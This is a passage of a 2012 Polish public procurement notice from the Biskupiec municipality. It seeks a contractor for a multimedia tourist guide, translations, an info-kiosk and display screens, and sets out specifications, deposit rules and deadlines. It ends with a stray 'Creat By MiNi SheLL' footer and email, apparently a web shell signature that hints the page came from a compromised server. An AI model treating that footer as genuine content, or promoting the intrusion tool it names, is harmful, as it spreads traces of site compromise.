22)	Ciekawostki (np. architektoniczne, legendy, rękodzieło, wierzenia itp. )  etnografia itp.
23)	Puby, hotele, pensjonaty, restauracje, gospodarstwa agroturystyczne, ośrodki wypoczynkowe itp.
24)	Stadniny Jazda konna
25)	Bankomaty i banki
26)	Biblioteki
27)	Instytucje publiczne m.in.: Szpital,Policja,Straż pożarna,Straż Miejska, Poczta
28)	Kalendarium imprez corocznych (w tym m.in.: Warmińska Uczta Pierogowa, Gra Straszydła, Misterium Paschalne itp.),
29)	Usługi publiczne (m.in. Stacje benzynowe, Taxi, warsztaty samochodowe, Parkingi, PKP PKS, apteki)
30)	Informacja Turystyczna
31)	Biskupiecki Dom Kultury, Dom Pracy Twórczej SORBOmA
32)	Hotspot
33)	Przystanie Wypożyczalnie sprzętu wodnego
34)	SPORT (m.in. stadion, boiska, kompleksy sportowe Orliki, bule francuskie, tenis itp.)
35)	Znani mieszkańcy Biskupca (conamniej 5 osób)
36)	Dane kontaktowe (telefony, e maile, faxy)
37)	Informacja dotycząca łowisk oraz gatunków ryb na terenie Gminy. 
38)	Mapy turystyczne, plany niektórych miejscowości, mapy jezior z ogólną charakterystyką zawierające m.in. głębokości, wskazanie najgłębszego punktu, najlepsze miejsca do połowów, występujące gatunki ryb oraz trasę dojazdu itp.
39)	Atrakcje turystyczne (m.in. paintball, place zabaw)
40)	Miasta partnerskie (Bramsche oraz sieć miast Cittslow)
1.2.Wykonawca wyznaczy ścieżki rowerowe o długości tras liczących nie mniej niż 300 km po Gminie i Mieście Biskupiec, obejmujące co najmniej 150 obiektów w Gminie i Mieście Biskupiec.
1.3.Zamawiający dopuszcza nieznaczne, uzasadnione korekty treści względem planowanego zakresu informacji zamieszczonych w przewodniku. Każda zmiana wymaga formy pisemnej i musi zostać zaakceptowana przez Zamawiającego.
2.Tłumaczenie j. angielski, j. niemiecki
2.1.Tłumaczenie  Przewodnika (wszystkich części przedmiotu zamówienia) na język angielski, niemiecki przez tłumacza przysięgłego.
2.2.Tłumacz przysięgły zobowiązany jest do zaparafowania każdej strony tekstu pierwotnego oraz tekstu przetłumaczonego. 
2.3.Wykonawca zobowiązany złożyć oświadczenie informujące, iż zamieszczony w przewodniku wersji tekst jest przetłumaczony przez tłumacza przysięgłego.
IV.SPRZĘT
1.Zakup i instalacja infokiosku wewnętrznego umieszczonego na korytarzu Urzędu Miejskiego w Biskupcu we wskazanym miejscu przez Zamawiającego o parametrach:
wolnostojąca, wandaloodporna, estetyczna obudowa
ekran LCD o wielkości min 17 cali zabezpieczony przed uszkodzeniami mechanicznymi
klawiatura oraz urządzenie wskazujące zabezpieczone przed uszkodzeniami mechanicznymi 
komputer z dedykowanym oprogramowaniem pozwalającym na korzystanie z Internetu oraz prezentację danych za pomocą materiałów audio i wideo  o jakości materiałów DVD lub lepszych
Gwarancja podstawowa 24 miesiące  
Certyfikaty CE, ISO 14001 
integracja ze stroną www.biskupiec.pl
Dopuszcza się zastąpienie klawiatury oraz urządzenia wskazującego dotykowym ekranem.
Parametry: system oraz parametry techniczne muszą umożliwiać co najmniej płynne odtwarzanie materiałów w jakości Full HD i dźwięku stereo.
2.System Wizualnej Informacji Turystycznej w tym zakup i montaż w Punkcie Informacji Turystycznej zlokalizowanej przy Pl. Wolności 5c w Biskupcu następujących elementów Systemu o parametrach nie gorszych niż:
2.1.Ekrany 42 cali z wąską ramką o parametrach nie gorszych niż: kontrast co najmniej 60000:1 full hd, częstotliwość odświeżania co najmniej 100 Mhz wraz z montażem w witrynie Punktu Informacji Turystycznej. Monitory muszą gwarantować czytelny obraz w nasłonecznionej witrynie. 
Ekrany należy zamontować jeden pod drugim na wykonanych przez Wykonawcę konstrukcji wsporczych zamontowanych na ścianie prostopadłej do witryny wystawowej. Wsporniki powinny być zamontowane na zawiasach umożliwiających swobodną zmianę położenia ekranu (obrót ramienia konstrukcji wsporczej ekranu oraz obrót ekranu). Należy przewidzieć dystanse amortyzujące uderzenie ekranu o ramę okienną. Powyższe informacje obrazuje rysunek pomocniczy, stanowiący załącznik do zakresu rzeczowego.
Wykonawca zobowiązany jest dokonać ustaleń dotyczących ostatecznego wyglądu zamocowania ekranów z Zamawiającym oraz pomiarów niezbędnych do wykonania konstrukcji wsporczej. Konstrukcja powinna być wykonana trwale i estetycznie.
2.2.Urządzenia lub rozwiązanie techniczne pozwalające na dzielenie obrazu komputera na dodatkowe ekrany.
2.3.Laptop zarządzający treścią z możliwością podglądu, do sterowania i zarządzania informacją na monitorach wraz z oprogramowaniem. 
2.4.System musi pozwolić na dzielenie obrazu na dwa ww ekrany oraz możliwość podglądu treści prezentowanych na nich w czasie rzeczywistym na trzecim monitorze lub dodatkowych monitorach.
2.5.System musi pozwalać na prezentację niezależnych treści na dwóch ekranach równocześnie.
2.6.System musi umożliwiać prezentację filmów w jakości DVD lub lepszej, prezentacje Power Point lub inne.
2.7.System nie starszy niż Windows XP w pełni kompatybilny z active direktory, domenami, GPO Microsoft Windows.
2.8.Parametry: system oraz parametry techniczne muszą umożliwiać co najmniej płynne odtwarzanie materiałów w jakości Full HD i dźwięku stereo.
3.Wykonawca zobowiązany jest przekazać sprzęt komputerowy po opracowaniu wersji elektronicznej przewodnika. 
V.INFROMACJA O LOGOTYPACH NA PRZEWODNIKU, MAPACH ect.
Wszelkie materiały opracowane w ramach Zamówienia powinny zawierać:
Znak Narodowej Strategii Spójności na lata 2007-2013 oraz logotyp: Program Regionalny. Narodowa Strategia Spójności
Flaga Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Rozwoju Regionalnego
Herb województwa warmińsko-mazurskiego
Logo Warmii i Mazur
Logo Miasta i Gminy Biskupiec udostępnione przez Zamawiającego
Materiały promocyjne powinny być opracowane zgodnie z Obowiązkami Beneficjentów w zakresie prowadzenia działań informacyjnych i promocyjnych projektów współfinansowanych ze środków Unii Europejskiej Regionalnego Programu Operacyjnego Warmia - Mazury.
VI.GWARANCJA
Gwarancja powinna być udzielona przez Wykonawcę na okres nie krótszy niż 24 miesiące i obejmować wszystkie składniki zamówienia. 
VII.	AKCEPTACJA KAŻDEGO ETAPU OPRACOWANIA PRZEWODNIKA PRZEZ ZAMAWIAJĄCEGO
Zamawiający zastrzega, iż każdy etap prac powinien być zaakceptowany (dopuszcza się email, fax). Czas związany z akceptacją zakresu zamówienia przez Zamawiającego - 5 dni roboczych od przedstawienia go do akceptacji przez Wykonawcę. Wykonawca zobowiązany jest nanieść zmiany i dostarczyć Zamawiającemu poprawiony materiał w ciągu 5 dni roboczych. Każdy etap opracowania przewodnika musi zostać odebrany protokólarnie przez Zamawiającego.
Nie przewiduje się zawarcia umowy ramowej i ustanowienia dynamicznego syst. zakupów.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie, w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług  zamówień uzupełniających, stanowiących nie więcej niż 20 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.34.00.00-9, 79.96.00.00-1, 79.82.25.00-7, 79.55.20.00-8, 71.35.40.00-4, 79.82.30.00-9, 79.82.20.00-2, 79.53.00.00-8, 79.82.40.00-6, 79.34.21.00-4, 72.21.20.00-4, 72.21.25.00-4, 72.21.23.16-7, 92.11.12.10-7, 30.23.13.00-0, 30.21.31.00-6, 72.41.50.00-2, 39.29.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda wniesienia wadium w wysokości 5 000,00 zł brutto (słownie: pięć tysięcy 00/100 złotych)
2. Wadium musi być wniesione przed upływem terminu składania ofert, wskazanego w SIWZ.
3. Wadium może być wnoszone w jednej lub kilku następujących formach: 
1) pieniądzu; 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancjach bankowych; 
4) gwarancjach ubezpieczeniowych; 
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.4)). 
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego tj. Bank Pocztowy S.A. placówka w Biskupcu 76 1320 1104 3132 3622 2000 0003.
5.Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym. 
6.Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, na poleceniu przelewu należy wpisać: Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur.
W pozostałych przypadkach (p.3.2.-3.5 niniejszego rozdziału) wymagane jest dostarczenie do dnia upływu składania ofert oryginału dokumentu wystawionego na rzecz Zamawiającego. 
7.W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu (data i godzina) środków na rachunek bankowy Zamawiającego.
Okoliczności i zasady zwrotu wadium, jego przepadku określa art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje usługi w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie polegające na  wykazaniu wykonania wykonywania usług polegających na:
1.	zaprojektowaniu i wykonaniu tzn. opracowaniu i doprowadzeniu do wydruku przynajmniej 1 dowolnej pozycji o wartości minimum  30 000,00 zł brutto, wykonanej w kolorze (wraz z grafiką i zdjęciami) w wersji papierowej. 
oraz na
2.	opracowaniu, wykonaniu i uruchomieniu co najmniej 1 strony internetowej.
Ocena spełnienia warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty dokumentów i oświadczeń. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu dokonywania oceny spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy Formularz oferty według wzoru stanowiącego załącznik 1 do SIWZ.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (odnośnie Sekcji III.3.2 niniejszego ogłoszenia - wiedzy i doświadczenia na okres korzystania z nich przy wykonaniu zamówienia).
3. Wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcom (załącznik  6 do SIWZ). Nie dołączenie do oferty załącznika  6 do SIWZ Zamawiający potraktuje jako deklarację wykonania zamówienia samodzielnie, bez udziału podwykonawców.
4.  Pełnomocnictwo - do reprezentowania wykonawcy w postępowaniu albo do reprezentowania wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. Pełnomocnictwo może być przedłożone wyłącznie w formie oryginału lub kopii poświadczonej przez notariusza.
5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa również dokumenty, o których mowa w niniejszym ogłoszeniu.
6. Wykonawca zobowiązany jest do  wniesienia wadium zgodnie z Sekcją III.1 niniejszego ogłoszenia
6.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1 ustawy:
a.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego  ustanawiają Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i do zawarcia umowy.
b.	W takim przypadku - oprócz dokumentów wymienionych w specyfikacji - wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego są zobowiązani do złożenia w ofercie Pełnomocnictwa ustanawiającego Pełnomocnika, o którym mowa w pkt. a. Pełnomocnictwo zawierać powinno umocowanie do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy. 
c.	Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia ( art. 23 ust. 3 ustawy Pzp.). Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia obowiązany jest wykazać, iż nie podlega wykluczeniu z udziału w postępowaniu, w świetle art. 24 ust. 1 ustawy Pzp. Natomiast  warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp, mogą być spełnione przez wykonawców wspólnie ubiegających o udzielenie zamówienia łącznie.
Forma dokumentów.
1. Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
2. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
3.  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, o których mowa w p. 2, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
4.  Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
5.  Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. Tłumaczenie nie jest wymagane, jeżeli zamawiający wyraził zgodę, o której mowa w art. 9 ust. 3 ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przyczyna - Przekształcenie firmy, zmiana nazwy firmy. 
Skutek - zmiana w umowie/aneks - Spisanie aneksu do umowy uwzględniającego dokonanie przekształcenia firmy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.biskupiec.pl/ogloszenia_przetargi.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 
al. Niepodległości 2, 11-300 Biskupiec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 12:00, miejsce: Urząd Miejski 
al. Niepodległości 2, 11-300 Biskupiec
pokój nr 10 (KANCELARIA), parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w związku z umową o dofinansowanie projektu
Opracowanie Multimedialnego Przewodnika po Gminie i Mieście Biskupiec oraz atrakcjach Warmii i Mazur wraz z infoznakowaniem na terenie Gminy
w ramach Osi Priorytetowej 2 - Turystyka Działanie 2.2 Promocja województwa i jego oferty turystycznej Regionalnego Programu Operacyjnego Warmia i Mazury 
na lata 2007-2013.
Uwaga
Ostateczny termin przygotowania wersji papierowej przewodnika do druku: 31 maja 2012r.
Ostateczny termin przygotowania wersji elektronicznej przewodnika do druku: 20 czerwiec 2012r.
Ostateczny termin realizacji zamówienia: 22 czerwca 2012r..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com